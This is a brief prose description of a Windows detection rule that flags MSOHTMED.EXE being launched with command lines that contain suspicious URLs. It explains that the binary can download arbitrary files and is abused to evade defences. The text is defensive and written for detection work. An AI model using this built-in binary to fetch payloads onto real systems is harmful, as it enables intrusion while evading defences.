The detection rule identifies potential malicious activities associated with the use of MSOHTMED.EXE, which can download arbitrary files from the internet through protocols such as HTTP, HTTPS, and FTP. This executable is known to be leveraged in attacks for evading defenses and executing unwanted downloads, often employed in various types of attacks as part of the attack execution tactics, particularly under the MITRE ATT&CK framework. The rule activates by monitoring process creation events that either launch MSOHTMED.EXE or utilize it to execute commands containing suspicious URLs. The detection requires that both the image path of the process and the command line parameters adhere to specified patterns. Potential false positives have been acknowledged due to the varied legitimate use cases of the tool. This rule supports detection initiatives focusing on enhancing security posture against evasion tactics in Windows environments.